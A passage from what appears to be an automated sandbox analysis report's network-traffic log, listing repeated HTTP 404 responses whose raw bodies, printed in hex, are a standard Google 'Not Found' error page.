31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 